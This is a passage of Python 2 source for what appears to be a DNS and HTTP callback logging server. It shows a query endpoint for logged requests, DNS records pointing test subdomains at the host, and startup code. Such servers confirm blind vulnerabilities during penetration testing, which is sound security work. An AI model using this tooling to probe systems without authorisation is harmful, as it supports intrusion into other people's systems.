v[2]}) 674 | 675 | elif action == 'http': 676 | sql = "SELECT url,headers,data,ip,insert_time FROM http_log where url like ? order by id desc limit ?,?" 677 | rows = DB.exec_sql(sql, query, offset, limit) 678 | 679 | for v in rows: 680 | result.append({'url': v[0], 'headers': v[1], 681 | 'data': v[2], 'ip': v[3], 'insert_time': v[4]}) 682 | else: 683 | return jsonify({'status': '0', 'msg': 'error action, plz http or dns'}) 684 | 685 | if result == []: 686 | return jsonify({'status': '0', 'msg': 'no result'}) 687 | else: 688 | return jsonify({'status': '1', 'rows': result}) 689 | 690 | def dns(): 691 | d = DNSServer() 692 | d.add_record('httplog', LOCAL_IP) 693 | d.add_record('x', LOCAL_IP) 694 | d.add_record('mock', LOCAL_IP) 695 | d.start() 696 | 697 | 698 | if __name__ == "__main__": 699 | msg = ''' 700 | Usage: python vtest.py -d yourdomain.com [-h 123.123.123.123] [-p password] 701 | ''' 702 | if len(sys.argv) < 2: 703 | print msg 704 | exit() 705 | options, args = getopt.getopt(sys.argv[1:], "d:h:p:") 706 | for opt, arg in options: 707 | if opt == '-d': 708 | ROOT_DOMAIN = arg 709 | elif opt == '-h': 710 | LOCAL_IP = arg 711 | elif opt == '-p': 712 | PASSWORD = arg 713 | API_TOKEN = md5("ded08972cead38d6ed8f485e5b65b4b6" + PASSWORD) 714 | 715 | if LOCAL_IP == '': 716 | sock = socket.create_connection(('ns1.dnspod.net', 6666), 20) 717 | ip = sock.recv(16) 718 | sock.close() 719 | LOCAL_IP = ip 720 | 721 | DB = sqlite() 722 | thread.start_new_thread(dns, ()) 723 | app.run('0.0.0.0', 80, threaded=True) 724 | --------------------------------------------------------------------------------